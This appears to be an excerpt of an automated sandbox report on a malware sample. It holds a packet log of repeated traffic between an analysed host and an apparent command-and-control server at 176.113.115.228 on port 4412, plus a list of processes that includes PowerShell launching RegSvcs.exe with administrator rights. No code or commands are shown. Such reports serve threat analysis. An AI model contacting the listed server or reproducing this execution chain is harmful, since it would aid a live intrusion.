Jan 26, 2025 10:36:03.529503107 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.562562943 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.564213037 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.610682011 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.688442945 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.689950943 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.694849968 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.811882973 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.820321083 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.825231075 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.934237003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.942246914 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.947299004 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:06.915055990 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:06.961744070 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.633966923 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.639168978 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.711914062 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.716850042 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.851433039 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.852612019 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.857564926 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.857620955 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.862437963 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.974394083 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.976077080 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.980982065 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.104640961 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.106350899 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:09.111181021 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.290158033 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:09.295129061 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.576638937 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.578399897 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:09.583355904 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:21.087090015 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:21.092170954 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.245496988 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.254523993 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.255918980 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.256062031 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.256144047 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.256145000 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.256206989 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.256365061 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.257608891 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.257762909 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.262571096 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.472568035 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.474520922 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.481369019 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:24.180862904 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:24.186090946 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:24.397557974 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:24.399249077 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:24.404094934 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.337131023 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:34.342619896 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.555246115 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.559336901 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:34.564336061 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.993383884 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:34.998528957 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:35.219703913 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:35.221750021 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:35.226773024 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:36.902303934 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:36.946343899 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:46.790302038 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:46.795414925 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:47.007421970 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:47.011389971 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:47.016360998 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:58.590872049 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:58.596406937 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:58.808052063 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:58.809874058 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:58.814994097 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:04.151443005 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:04.156507015 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:04.368257046 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:04.373284101 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:04.378196955 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:06.917681932 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:06.977711916 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:07.212412119 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:07.217536926 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:07.432086945 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:07.434211016 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:07.439559937 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:11.056114912 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:11.061599016 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:11.273257971 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:11.275724888 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:11.280879021 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:22.852962971 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:22.858017921 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:23.070699930 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:23.118339062 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:23.204297066 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:23.209712029 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:31.415563107 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:31.420692921 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:31.509462118 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:31.514764071 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:31.646275043 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:31.648147106 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:31.653599024 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:31.767760038 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:31.769145012 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:31.774019003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:36.936336040 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:36.977803946 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:43.306102037 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:43.311590910 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:43.523152113 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:43.537689924 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:37:43.542886972 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:37:54.146080971 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 04:34:09 |
Start date: | 26/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be880000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 04:34:09 |
Start date: | 26/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 04:34:12 |
Start date: | 26/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb50000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 04:34:12 |
Start date: | 26/01/2025 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6070d0000 |
File size: | 229'728 bytes |
MD5 hash: | 74A0194782E039ACE1F7349544DC1CF4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 11 |
Start time: | 04:37:43 |
Start date: | 26/01/2025 |
Path: | C:\Windows\SysWOW64\WerFault.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x590000 |
File size: | 483'680 bytes |
MD5 hash: | C31336C1EFC2CCB44B4326EA793040F2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|